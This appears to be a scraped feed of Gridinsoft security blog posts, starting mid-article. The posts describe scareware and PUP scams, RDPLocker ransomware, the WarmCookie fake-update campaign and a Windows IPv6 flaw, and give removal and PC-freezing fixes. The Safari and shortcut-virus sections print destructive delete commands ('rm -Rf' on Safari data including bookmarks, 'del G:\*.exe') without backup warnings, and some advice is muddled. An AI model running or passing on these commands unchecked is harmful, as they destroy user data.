Crooks posing as “Microsoft-certified technicians” instruct victims to grant remote access, pretending to diagnose issues. In reality, they plant additional junkware, modify system settings, and pressure users into paying for unnecessary services.

These programs frequently display fake security warnings, convincing users that urgent action is necessary. After running a sham system scan, the software presents a long list of supposed infections. However, the “free” version conveniently cannot remove them. Apps push the victims to purchase the full version, which merely clears the list — without providing any real protection or optimization.

To make matters worse, scam websites often employ browser-locking scripts, preventing users from closing the page. PUPs also are notorious for injecting aggressive advertisements – pop-ups, banners, and in-text ads – disrupting the browsing experience and sometimes covering legitimate website content. These ads can lead to malware-laden pages or execute drive-by downloads, silently installing additional threats. Even a single misclick can result in severe infections.

Another critical concern is data tracking. Many PUPs harvest user information, including IP addresses, search history, visited websites, and in some cases even keystrokes. However, the last one characterizes the threat of the other type – spyware. In any case, this data is sold to third parties, potentially leading to privacy breaches, targeted phishing attacks, or even identity theft. Some PUPs go further by mining cryptocurrency or running background processes, significantly degrading system performance.

How Do PUPs Infiltrate the System?

Many PUPs get into the computer without explicit user consent, often bundled with freeware or delivered via misleading ads. While some PUPs have official websites, most spread through deceptive methods. Developers rely on “bundling” — hiding unwanted programs inside installation packages of legitimate software.

Since many users rush through installations without reviewing options, they unknowingly allow PUPs onto their systems. These unwanted programs are often concealed within “Custom” or “Advanced” installation settings, which many users overlook. Intrusive ads also play a role, redirecting users to sites offering fake downloads or deceptive prompts, leading to unintentional PUP installations.

How to Prevent PUP Infections?

To minimize the risk of PUP infections, users must adopt cautious browsing habits. This is especially important when visiting streaming, gambling, or adult content websites. Downloading software should be done exclusively from official sources, as third-party downloaders often distribute bundled PUPs. When installing software, reviewing the “Custom” or “Advanced” settings is crucial to opting out of any hidden programs. If a browser starts redirecting unexpectedly, users should inspect and remove suspicious extensions or applications that may have been installed without their knowledge.

As I said above, scammers rely on social engineering to manipulate users into falling for their schemes. Fraudulent pop-ups often feature spelling mistakes and poor design, making them appear unprofessional. They also employ urgency tactics, such as countdown timers, to pressure users into taking immediate action.

Claims that users have won a prize, despite never entering a contest, are another red flag. Additionally, pop-ups that appear to scan a device for viruses are always fraudulent, as webpages cannot perform such actions. Finally, any pop-up offering an exclusive financial opportunity only for the user is a clear scam attempt.

While most pop-ups do not directly install malware, they can still lead to financial loss or identity theft. Sometimes they can prevent to close web browser. If this happens, the one way to terminate the browser is to use Task Manager or restart the system by physical button on pc/laptop. Upon reopening the browser, avoid restoring the previous session to prevent reloading the malicious page.

The post Windows Defender Security Center Scam appeared first on Gridinsoft Blog.

One of the distinctive features of the malware is the changes to system wallpaper: it swaps the original one for a black background with red sign on it. The sign says “All your files are stolen and encrypted. Find readme.txt and follow the instructions”. Users will also notice all the files getting the .rdplocker extension: document.docx will become document.docx.rdplocker, song.mp3 – song.mp3.rdplocker, and so on.

Readme.txt Ransom Note Overview

The mentioned readme.txt file is a ransom note, that contains basic description of what has happened and how one can revert the encryption. It also boasts of using intermittent encryption and describes it as something that makes malware undetectable and enormously fast. In fact, this technique is far from being new, and there are more effective ways to make the file encryption faster.

Other parts of the ransom note are fairly generic and consist of threats and promises of file recovery. Hackers say about the need to contact them within a 48 hour deadline, otherwise they will delete the decryption key and publish all the leaked data. For a contact information, they offer a single email address – rlocked@protonmail.com

RDPLocker Ransomware Overview

RDPLocker malware is an example of small-batch ransomware that non-selectively targets corporations and individuals. Typical distribution channels for this malware include email spam and online scams, like the fake human verification pages. Due to the extensive packing and encoding, the malware is highly evasive for static analysis, meaning that standard antivirus software may struggle to detect it.

Upon execution, the malware checks a selection of system characteristics to prevent it from running on virtual machines or in debug environments. After passing these checks, RDPLocker starts its malicious activity by stopping Microsoft Defender and disabling/deleting all the basic Windows backup methods.

Once done with “preparing” the system, the ransomware switches to file encryption. The used encryption algorithm is quite strong and in fact excludes any brute force decryption. Nonetheless, there are options for free file recovery that I will describe in the next section of that article.

The encryption process ends up with adding a ransom note to C:\Users\%username\Links, and changing the wallpaper to its specific one. Simultaneously, the malware assigns the decryption key a timestamp, so malware actors can count 48 hours from that moment.

How to Remove RDPLocker Virus?

Before any recovery attempts, I will heavily recommend one to remove the malware. After finishing the encryption, it remains active, seeking for more files to cipher. As the result, all the recovered files will get encrypted as soon as they end up in the system.

GridinSoft Anti-Malware is a program that will get you covered. Its multi-component detection system will detect and remove the ransomware, regardless of how evasive it is. Download it by clicking the banner below, and run a Full Scan to check the entire system.

How to restore .rdplocker files?

Despite how “cutting-edge” RDPLocker ransomware is, there are several ways to recover the files. Intermittent encryption may hamper the ability to access the file directly, but leaves enough file content untouched to perform recovery operations.

Try running media files (videos, music) with WinAmp. As only certain sections of the file are encrypted, you are likely to be able to run the files with some specific software. Remove the ransomware extension and give it a try. It will expectedly miss the ciphered parts, but that is already better than having no accessible files at all. WinAmp fits the purpose as it ignores file integrity, which is obviously disrupted in the encrypted files.

Large files are often unencrypted. To speed up the process, ransomware may ignore files that are over 500MB in size, only appending its extension to it and moving on to the next file. Archives (7z, RAR, ZIP etc), large videos and some of the MS Office documents can be free of any encryption. All you need is to remove the ransomware extension and try opening them as usual.

Use file recovery tools. One more remedy is using file recovery tools. Depending on the way the malware handles the files during the encryption process, it may be possible to restore them in pre-encryption state. Any tool of your choice will fit; key characteristic is the ability to recover as much file formats as possible.

The post RDPLocker Ransomware appeared first on Gridinsoft Blog.

FakeUpdate Spreads WarmCookie as Chrome, Edge Updates

Researchers at Gen Threat Labs have uncovered a campaign spreading the WarmCookie backdoor. The core of the is a previously known FakeUpdate, that involves tricking victims into downloading and running a fake web browser update. As I’ve mentioned in the introduction, these attacks are currently targeting users in France. Besides popular browsers like Google Chrome, Mozilla Firefox, and Microsoft Edge, the campaign also offers “updates” for apps like Java, VMware Workstation, Proton VPN, and WebEx. To do this, attackers hack or create websites that display fake web browser update requests. And, sure enough, as one follows the demand, they receive a malicious program under the guise of browser update.

In fact, FakeUpdate campaign is not entirely new, as previous similar campaigns have circulated online. It is also not new for WarmCookie to use tricky and unusual spreading schemes. Researchers previously encountered this backdoor being distributed under the guise of job offers. This time, however, aside from the new distribution method, there is an updated version of WarmCookie. It can now enable data and file theft, device profiling, program enumeration (through the Windows Registry), arbitrary command execution via CMD, screenshot capture, and additional malware installation capabilities.

FakeUpdate France Campaign Details

In brief, the FakeUpdate site is designed to mimic the real one, featuring a pretty convincing URL. As of the time of writing, the site edgeupgrade[.]com was still operational. Clicking the Update button downloads an installation file “Install_x64.exe”, which is the WarmCookie backdoor. According to the researchers’ report, once launched, the malware performs standard checks for a virtual environment. If no virtual environment is detected, it gathers the system fingerprint and sends it to the attackers’ C2 server.

As previously mentioned, this backdoor provides attackers with unrestricted access to the compromised system. The latest campaign observed by Gen Threat Labs shows WarmCookie has been upgraded with new capabilities. Among others, running DLLs from the temp folder and transmitting the output, alongside the ability to transfer and execute EXE and PowerShell files. Beyond basic data theft, attackers can also deliver payloads like ransomware.

Regarding legitimate web browser updates, all modern browsers on Windows are now automatically updated. This eliminates the need to download any installation files manually – the user may only need to restart the browser.

How to Stay Protected?

As this campaign has several distinct milestones in user interaction, the key to avoiding this threat will be in proactive counteraction. First and most effective solution is to remain vigilant while browsing the web. Even with highly convincing phishing campaigns, exercise caution when prompted to download or update software. Instead, always visit the official website of the application you intend to update.

Another proactive option is to use advanced anti-malware software with built-in Internet security. If the first precaution is overlooked, anti-malware software will block access to phishing pages. GridinSoft Anti-Malware offers advanced protection, including an Internet Security feature, making it a strong option to consider.

The post FakeUpdate Campaign Spreads WarmCookie Virus in France appeared first on Gridinsoft Blog.

Windows TCP/IP RCE Vulnerability Impacts All Systems with IPv6 Enabled

Researcher XiaoWei from Kunlun Lab has reported the discovery of a critical remote code execution vulnerability in the Windows TCP/IP stack. The vulnerability, identified as CVE-2024-38063, carries a CVSS score of 9.8 and can be exploited without user interaction (zero-click). While details are scarce at the time of writing, it is known that an attacker can send IPv6 packets containing specially crafted payloads to the target system. CVE-2024-38063 affects all supported versions of Windows 10, 11, and Windows Server. It should be explicitly noted that the issue affects only IPv6 users, as it is impossible to send the said crafted v6 packets to an IPv4 address.

Still, the research uncovers that CVE-2024-38063 leads to a buffer overflow. As a result, it allows an attacker to execute arbitrary code at the SYSTEM privileges level on the target system. This could potentially result in full control over the compromised system. Also, I expect to see more details as time goes on and the patch is installed on more systems, so the researcher can release the info with less risk.

Impact of such a vulnerability may have been tremendous, if Microsoft decided to ignore it or just missed it as a whole. These days, IPv6 is not that widespread, but experts around the world consider it to be the future of the Internet. And now, imagine the hackers being able to deploy malware to any device, any time without any user interaction. This is what could have happened should this flaw appear a decade later, after the global IPv6 introduction.

Microsoft’s Response and Mitigation

Microsoft noted that this is not the first vulnerability of this kind, and attackers have actively exploited previous ones. The company anticipates that attackers will eventually develop exploits to take advantage of this vulnerability. Fortunately, Microsoft already offers a fix in the form of its latest, August 2024 Patch Tuesday update. Additionally, organizations are advised to monitor network activity and implement network segmentation. These measures are intended to limit lateral movement of the threat in the event of a system compromise.

Microsoft also suggested a temporary workaround involving the disabling of the IPv6 protocol. However, the issue lies in the fact that IPv6 is enabled by default on most systems, and some Windows components rely on it. Disabling IPv6 could, therefore, disrupt the functionality of other Windows components.

The post Critical Windows TCP/IP Vulnerability Uncovered, Patch Now appeared first on Gridinsoft Blog.

What is Shortcut Virus?

Shortcut Virus is a type of malware that makes the data look as lost, turning all the files into shortcuts. The virus modifies the file structure on a USB drive, replacing real files and folders with shortcuts with the same icons and names. This tricks the user and causes the virus to launch when they try to open the file. However, the original files are usually hidden or moved to a hidden partition.

The virus spreads primarily through USB devices and automatically copies its executable file to the device. This file is usually saved in the root directory of the USB drive and disguised as a safe, familiar file using common icons and names such as “My Documents” or “Recycle Bin”. It also actively uses the autorun functionality via the Windows registry. This allows it to run malicious code as soon as the device is connected to the computer. The “.lnk” files are a key element of this process, as they can be executed automatically and mask the launch of the malicious executable.

Some users want to re-use old drives, that potentially contain this malware. But for many, it is a risk to plug it into their current computer and infect it. And that leaves the question: how to safely recover files or format a hard drive?

How Is Shortcut Virus Dangerous?

Shortcut Virus poses a serious threat to users who regularly use removable media. The main dangers associated with this virus include:

• The worst part is that the virus can also hide or delete the original files on the USB drive. This often results in the loss of important information that may be difficult or impossible to recover.
• Shortcut Virus easily and stealthily spreads from one device to another, infecting all USB devices connected to the infected computer.
• Shortcut Virus can function as a Trojan by collecting user’s personal data such as passwords, financial information and other sensitive data.
• Once on system disks, the virus can disable or compromise a computer’s security, making the system more vulnerable to other malicious attacks.

How to remove Shortcut Virus?

Shortcut Virus removal requires a careful approach to not only get rid of the virus but also to restore access to the original files.

Step 1: Disable USB device autorun

To prevent the virus from automatically starting when USB devices are connected, disable USB device autorun:

1. Open “Registry Editor” (press Win + R, type regedit and press Enter).
   
2. Navigate to the HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer path.
   
3. Create or modify a DWORD value named NoDriveTypeAutoRun and set the value to 0xFF to disable autorun for all disk types.
   

Step 2: Cleanup the registry

Since the virus can create registry entries to run automatically, you need to clean the registry:

1. Open “Registry Editor” (press Win + R, type regedit and press Enter).
   
2. Navigate to:
   HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
   
3. Remove any suspicious values that may run malicious files on system startup.
   

Step 3: Manually Removal

Several commands can be used to manually remove Shortcut Virus via Command Prompt, including cleaning malicious files:

1. Open “Command Prompt” (Type cmd in the search box and click “Run as administrator” to open elevated Command Prompt.).
   
2. The virus often hides the original files and replaces them with shortcuts. To display them:
   attrib -h -r -s /s /d G:\*.*
   “G:\” – the drive letter of your USB device.
3. First, remove any shortcuts that the virus has created. These shortcuts may be the source of the infection:
   del G:\*.lnk
4. Next, remove malicious executable files that are usually hidden in the USB root or system folders:
   del G:\*.exe
5. Check the C:\Windows\, C:\Windows\System32\, and C:\Users\[username]\AppData folders for malicious files and delete them.

Be very careful when using the command line, especially when working with uninstall commands and registry editing. Incorrect actions may cause damage to the system.

Shortcut Virus Remover

To remove Shortcut Virus, one of the most effective approaches is to use specialized antivirus software that can detect and remove complex malware. One of the recommended tools for this task is Gridinsoft Anti-Malware.

Gridinsoft Anti-Malware features fast scanning speeds and the ability to detect various types of malware, including Shortcut Virus. It also provides in-depth system and USB device scanning. This allows you to detect and remove hidden and standalone viruses that may not be noticed by standard antiviruses.



Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

Download Anti-Malware

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.



Click "Clean Now" to start the removal process. Important: removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.



The post Shortcut Virus appeared first on Gridinsoft Blog.

]]> https://gridinsoft.com/blogs/usb-shortcut-virus/feed/ 0 https://gridinsoft.com/blogs/windows-defender-security-warning-scam-how-to-remove/ https://gridinsoft.com/blogs/windows-defender-security-warning-scam-how-to-remove/#comments Tue, 02 Jul 2024 09:14:36 +0000 https://gridinsoft.com/blogs/?p=12958 Have you ever encountered a Windows Defender security warning pop-up while browsing? This type of malicious activity is designed to trick you into contacting scammers. Fortunately, you can quickly get rid of it. Here, we will explain how to remove this scam and protect yourself from other viruses. What is the Windows Defender Security Warning? […]

The post Windows Defender Security Warning appeared first on Gridinsoft Blog.

]]> Have you ever encountered a Windows Defender security warning pop-up while browsing? This type of malicious activity is designed to trick you into contacting scammers. Fortunately, you can quickly get rid of it. Here, we will explain how to remove this scam and protect yourself from other viruses.

What is the Windows Defender Security Warning?

This warning is the result of scareware or a phishing scam. Its purpose is to redirect you to a webpage that visually resembles the official Microsoft website. However, the URL does not match the official site. The page may display a message claiming that your computer is infected with malware and that you need to contact a support agent by phone to fix the problem.



Unfortunately, the notification looks like a legitimate Windows message, making it especially dangerous – many users may not even attempt to verify i= on Google. Scammers commonly make the pop-up as convincing as possible so that people don’t suspect anything is wrong. The provided phone number will likely connect you to a fraudulent call center. The agent may try to get you to install malware to infect your computer, steal your personal information, or demand money for fake services.

Why is the Windows Defender Security Warning False?

At first glance, you might mistake this for a legitimate warning from Windows Defender. However, if you’re familiar with Windows Defender, you’ll notice differences from a genuine notification. Therefore, please do not call the phone number provided in the window because it is not a real alert. Here’s why:

• It’s not the Windows Defender interface. Windows Defender, also known as Windows Security, is a built-in Windows application with a different interface. It will never display a browser pop-up or webpage; it uses system notifications instead.
• Strange text and typos. A banner or page showing a Microsoft Defender alert often contains strange text designs and grammatical and stylistic errors, which sharply contrast with the short and informative Defender notifications.
• Microsoft never provides contact numbers for users. Users can contact Microsoft support through the “Get Help” application if they encounter problems.

This Windows Defender security alert is flawed in both format and content. It’s often a low-level phishing scam aiming to sell a rogue antivirus service, which can harm your computer. In some cases, you might not be able to close the alert or switch to other applications.

Causes of the Windows Defender Security Warning

There are several reasons why you might see a Windows Defender security warning. Here are the most common ones:

• You clicked on an ad that redirected you to a fake site.
• You visited a hacked website that redirected you to a fraudulent page.
• You have a malicious program installed on your device, often a result of adware activity.

There are also many other ways you could be exposed to fraud, depending on various factors, such as the external devices you share with others. Simply closing the window may not solve the problem, especially if adware is causing it. The pop-up message may appear every time you open your browser.

How to Remove the Windows Defender Security Warning

Since the Windows Defender security warning appears in your browser, most actions to get rid of it are related to your browser. These steps can help resolve the issue of Windows Defender security warning pop-ups:

• Force close and reopen your browser.
• If the problem with redirecting to a fraudulent page persists, reset your browser (instructions below) or reinstall the browser completely.
• If this continues, you may have adware or a PUP (potentially unwanted program) installed on your computer, and you need to remove it.

If you’re unsure which installed application is causing the pop-up notifications, install antivirus software to detect and remove the infection from your computer.

How to Clear the Browser from the Windows Defender Security Warning

Resetting your browser settings is one of the first steps to eliminate the Windows Defender security warning scam. Here are the instructions for different browsers:

Remove the Windows Defender Scam from Chrome

1. Click on the three vertical … in the top right corner and Select Settings.
   
2. Select Reset and Clean up and Restore settings to their originals defaults.
   
3. Click Reset settings.
   

Remove the Windows Defender Scam from Firefox

1. Click the three-line icon in the upper right corner and select Help
   
2. Select More Troubleshooting Information
   
3. Select Refresh Firefox… then Refresh Firefox
   

Remove the Windows Defender Scam from Microsoft Edge

1. Press the three dots
   
2. Select Settings
   
3. Click Reset Settings, then Click Restore settings to their default vaues.
   

Remove the Windows Defender Scam from Safari

1. Open the terminal (press ⌘ Command + Spacebar to open the spotlight, type “terminal” and press “Enter”)
2. Enter these commands one at a time. Execute each command by pressing “Enter” after copying it into the terminal:


rm -Rf ~/Library/Caches/Metadata/Safari;
rm -Rf ~/Library/Caches/com.apple.Safari;
rm -Rf ~/Library/Caches/com.apple.WebKit.PluginProcess;
rm -Rf ~/Library/Preferences/Apple\ -\ Safari\ -\ Safari\ Extensions\ Gallery
rm -Rf ~/Library/Preferences/com.apple.Safari.LSSharedFileList.plist;
rm -Rf ~/Library/Preferences/com.apple.Safari.RSS.plist;
rm -Rf ~/Library/Preferences/com.apple.Safari.plist;
rm -Rf ~/Library/Preferences/com.apple.WebFoundation.plist;
rm -Rf ~/Library/Preferences/com.apple.WebKit.PluginHost.plist;
rm -Rf ~/Library/Preferences/com.apple.WebKit.PluginProcess.plist;
rm -Rf ~/Library/PubSub/Database;
rm -Rf ~/Library/Safari/*;
rm -Rf ~/Library/Safari/Bookmarks.plist;
rm -Rf ~/Library/Saved\ Application\ State/com.apple.Safari.savedState;


What to Do if the Problem Persists?

If you have followed all the steps above and still see this warning every time you use a web browser, it is a clear sign that malware is still on your computer. You can use professional antimalware software such as GridinSoft Anti-Malware to scan your computer and remove any viruses or malware found. After taking such drastic measures, the antimalware software will remove and neutralize more dangerous cyber threats that could cause severe damage to your files.



Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

Download Anti-Malware

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.



Click "Clean Now" to start the removal process. Important: removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.



How to Avoid Scams like the Windows Defender Security Warning

As mentioned earlier, the Windows Defender security warning scam is not the only threat you may encounter on your computer. There is much more severe malware on the Internet, and as a prudent user, you should take every precaution to avoid them. Here are some basic tips:

• Ensure your OS and apps are up to date
• Only download apps from official websites
• Avoid clicking on random links without knowing where they will take you
• Don’t download suspicious apps
• Do not open attachments in suspicious emails
• Use an ad blocker to block malicious ads
• Use advanced antivirus software

Your computer should now be clean and free of Windows Defender scams. To prevent this from happening again, practice good online hygiene to protect yourself from fraud. Perform regular scans and use malware protection to stop threats before they happen.

The post Windows Defender Security Warning appeared first on Gridinsoft Blog.

]]> https://gridinsoft.com/blogs/windows-defender-security-warning-scam-how-to-remove/feed/ 2 https://gridinsoft.com/blogs/how-to-prevent-my-computer-keep-freezing/ https://gridinsoft.com/blogs/how-to-prevent-my-computer-keep-freezing/#comments Thu, 20 Jun 2024 15:20:10 +0000 https://gridinsoft.com/blogs/?p=11791 Have you ever been in the middle of a project when your computer suddenly freezes? Maybe the cursor stops moving, or you get the dreaded blue screen of death, forcing you to restart. If this sounds familiar, don’t worry! While it’s frustrating, you can often fix these issues yourself. The key is to understand why […]

The post 5 Methods to Fix Computer Keeps Freezing appeared first on Gridinsoft Blog.

]]> Have you ever been in the middle of a project when your computer suddenly freezes? Maybe the cursor stops moving, or you get the dreaded blue screen of death, forcing you to restart. If this sounds familiar, don’t worry! While it’s frustrating, you can often fix these issues yourself. The key is to understand why your PC might be freezing and then take steps to prevent it.
This article will show you what to do if your computer keeps freezing for no obvious reason.

Why does my computer keep freezing?

There are some reasons why your computer keeps freezing or works poorly. Usually, it is a software problem, or too many apps are running on your computer simultaneously, which causes it to hang. We will not consider the option with weak hardware, where the system initially ran slowly. However, additional problems, such as a lack of hard disk space or issues with drivers, can also prevent it from working correctly.

So, what to do when you encounter the problem that a Windows PC freezes randomly?

Check if your computer is entirely dead-locked

To understand if your computer is completely frozen, you can try to move the mouse cursor over the screen. If it doesn’t move, your PC is locked and requires a forced reboot. You can also try pressing the “Caps Lock” button on your keyboard, this is another possible solution to computer crash randomly problems. If the Caps Lock indicator lights up, it’s probably a software problem and can be solved with the Windows Task Manager.

So, to do this, press Ctrl+Alt+Del and select the frozen program, then press End Task. However, if the Caps Lock indicator doesn’t work, your computer is dead-locked, and you need to restart your computer. Desktop computers may be rebooted with a button on a system unit, perhaps this will help to avoid computer freezing completely.. If you have a laptop, press the power button for ~10 seconds, forcing your PC to shut down.

Software Issues When Computer Keep Freezing

Software issues are the most common cause of my PC freezing randomly. At some point, the software loses control of the application or tries to run the application in a way that the Windows operating system does not recognize. This often happens when trying to run old programs in new versions of Windows or vice versa. Updating the software and the OS usually corrects the PC freezing problem. However, in some cases, reinstalling the application is the most effective way to deal with occasional software-related hangs.

Sometimes errors in running programs cause memory leaks. This happens when objects in a heap are no longer used. However, the garbage collector cannot remove them from memory; thus, they remain there unnecessarily. A memory leak is not good because it blocks memory resources and reduces system performance over time.

Check for Running Resource-Intensive Software

Sometimes, programs will remain running in the background even after you end working with them. This particularly true for different sort of virtual machines: they can stay in the background, showing no activity, while taking significant amount of your CPU and memory. Particular names to seek for in Task Manager are “Vmmem” (or “Vmmemvsl”), “VirtualBox”, “Vmware-vmx” or the like. Stopping them will give a huge relief to your hardware.

Check for Malware and Viruses

Computer freezes and crashes can be signs that your computer is infected. In some cases, malware loads your system by running dozens of processes in the background, consuming your computer’s RAM and causing it to freeze. It is often coin miners’ work, as it is their typical behavior – overloading the system, leaving no resources for other applications. In contrast, viruses can corrupt system files, without which the system cannot work correctly. As a result, this can cause blue screens of death. If your PC keeps freezing after rebooting, we recommend checking it for viruses with a our security solution.



Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

Download Anti-Malware

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.



Click "Clean Now" to start the removal process. Important: removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.



Processor overheating

Because computers are susceptible to heat, a room without air conditioning on a 90-degree day can negatively affect your computer’s performance. You can tell if your PC is overheating by listening to your laptop or desktop computer’s internal fans. Suppose the cooling is running too loud or louder than usual. In that case, you should dust your PC and replace the thermal paste on the processor.

However, there is the opposite situation when the processor is overheating, and the cooling does not work, i.e. fans are silent. In this case, you should carefully inspect the coolers, maybe they are faulty, or contact is lost, listen further if your computer locks up randomly. At best, the processor will start to throttle, and at worst, overheating can lead to a complete shutdown. Next, get some air circulation in the room and ensure the CPU vents are not clogged with dust. If the problem with the PC keeps freezing is gone, that was the reason for the issue.

Multitasking Issues

Each program on your computer requires some internal and external (hardware) resources to run. If you run multiple programs simultaneously, your computer may need more memory or processing power. Therefore, run programs only as required to reduce the chance of being short on resources.

We also recommend checking the program autorun settings and disabling the autorun of unnecessary applications. This will significantly speed up the startup of your laptop. To do this, run the task manager, go to the “startup applications” tab, and disable unnecessary applications.



Driver Issues

Drivers directly affect the performance of your PC and can cause the computer to constantly freeze. If application drivers are corrupt or outdated, applications cannot appropriately interact with your hardware. Most modern operating systems get drivers from the Windows Update Center after installation, but drivers are rarely updated there. This is especially true for drivers for graphics adapters. For example, suppose your PC has powerful hardware but works slowly in graphics applications. In this case, we recommend downloading and installing the latest video driver from the manufacturer’s website. In most cases, this will solve the problem of poor performance in applications and the PC freezes for a few seconds.

Computer Keep Freezing? Lack of RAM!

Lack of memory is often the cause of occasional freezes. Unfortunately, you cannot solve this issue programmatically. However, you can try increasing the memory dump. The easiest way to check for insufficient RAM is to run a Windows memory diagnostic. Below are the steps to update your RAM:

1. Open the Start menu and type in Windows Memory Diagnostic Tool in the search box.
   
2. Click on it. This will reboot your system and check out your memory. It will also notify you if it finds any problems.
   

If no errors are found, there is probably nothing wrong with the memory. Most likely, your system and applications don’t have enough RAM. Consider upgrading your PC. At the very least, try adding RAM to fix the problem. You can find out if your system has enough RAM by running Task Manager and opening the Performance tab. If your device’s RAM is more than 70% used, you should add RAM to your device.

If you have a desktop PC, everything is as simple as possible. You just need to find out what type of memory you have installed. To do this, you need to open Task Manager, go to the tab performance, and click on memory.



If your memory type is not displayed there, use special utilities, such as AIDA64.



If you have a laptop, google your model to find out what RAM it uses. However, not all laptops allow you to expand RAM because, in compact models, this memory is soldered onto the motherboard and is physically impossible to replace.

Hardware issues that lead to the computer freezing

A more severe problem is a hardware issue, where a particular computer component is not working correctly or is malfunctioning. This can happen for some reasons, such as overheating or excessive dust buildup on components inside the computer. For example, as trivial as it sounds, a mouse or keyboard cord can become damaged over time, and a wireless device can have a dead battery. For the past few years, all computers have been equipped with high-speed SSD drives, but older machines have obsolete hard disk drives.

If your device has an older hard drive, we recommend replacing it with a faster SSD. This is guaranteed to give a significant performance boost to your PC. Although SSDs, if used correctly, can last quite a long time, and there will be no problems with their work if the SSD fails, it stops working completely.

How to Fix Computer Keeps Freezing

Are you facing the problem that “computer keeps freezing randomly”? In addition to the tips above, you can apply some of the following valuable techniques to minimize the risk of your computer freezing frequently:

Method #1. Clean up Windows Temporary Files

Microsoft Windows uses a cache to store temporary files to access them quickly. In addition to the fact that these files take up extra space, they can also interfere with Windows, causing performance issues. If you clear the cache folder, you can remove all unneeded files that may have been created in the past. And may have caused your OS to hang. To clear the Windows cache files, follow these steps:

1. Press Win+R and type or paste “%temp%” in the Run window to open the temporary cache folder.
   
2. Please select all the files with the CTRL+A key combination and then permanently delete them. You can use the disk cleanup tool by clicking start and typing “disk cleanup” in the search box.
   
3. In the window that opens, select the drive where the OS is installed (by default, it’s the C drive). Then, choose the types of data you want to delete in the next window. If you have very little space, you can select all of them.
   

Method #2. Check The Disk For Malfunctions

Suppose the hard drive’s response speed is not up to standard. In that case, Windows may not be able to access it at the necessary rate, and this causes the hard drive to freeze between access intervals. In addition, fragmentation errors may occur on the hard drive due to a PC crash or abnormal termination. Windows has a built-in tool to help you identify and fix disk problems. Another step that will help eliminate the problem is that my computer is hanging again and again. To do this, follow these steps:

1. Right-click Start and select Terminal (Administrator).
   
2. Type or paste “chkdsk” at the command prompt and press Enter.
   

This will start checking your hard drive for malfunctions using the Windows command line. Sometimes Windows will need to reboot to complete the check. When the utility finishes, it will notify you of any disk errors.

Method #3. Run Defragmentation

Defragmentation is reorganizing the data stored on your hard drive so that pieces of data line up continuously. It picks up all the parts of data that are scattered across your HDD and puts them back together in an orderly, neat, and clean fashion. To do so:

1. Open My Computer
2. Right-click on the desired drive and choose Properties.
   
3. Click the Tools tab.
4. Click Optimize
   
5. When the window appears, click Optimize.
   

As a result, defragmentation increases your computer’s performance by reducing the time it takes to access data and allows you to use your storage more efficiently.

Method #4. Run Memory Check

If you suspect your computer has memory problems, you can run the Windows Memory Diagnostics utility by completing the following steps:

1. Press Windows + R key combinations and type mdsched.exe in the input box. Then press Enter.
2. Click Restart now and check for problems (recommended) to check for problems immediately (If you want to check later, click “Check for problems the next time I start my computer”).
3. Windows will restart and you will get the following window showing the progress of the check and the number of passes it will run on memory. It might take several minutes for the tool to finish.

Method #5. Run System File Checker

Sometimes computer keeps freezing randomly due to corrupted or missing system files. Fortunately, the OS has a system file checker that should help you restore the original files. With any luck, it will automatically fix your problem. To use this tool, run the command line as administrator and type or paste the following command:

sfc /scannow



Windows will scan its files, and if it finds a corrupt or missing file, Windows will try to fix it automatically.



No matter how well you maintain your PC, all systems hang at some point. This can happen due to issues with operating system updates, as seen with some of the recent updates for Windows 10. For example, the October 2023 update, known as KB5031356, experienced significant installation issues due to the 0x8007000d error, which prevented successful update completions and led to other operational challenges like slow performance and reboot loops.

However, understanding what causes your computer to hang can help you prevent problems and troubleshoot problems in the future. We hope that the methods described above have helped you to solve the Windows freeze problem so that you can get back to using your device comfortably. Suppose none of the above solutions did help to solve the problem with computer keeps freezing. In that case, your PC likely has a hardware problem that requires further investigation. In this case, you can apply to the service center, where qualified specialists will be able to find and fix the problem.



The post 5 Methods to Fix Computer Keeps Freezing appeared first on Gridinsoft Blog.

]]> https://gridinsoft.com/blogs/how-to-prevent-my-computer-keep-freezing/feed/ 1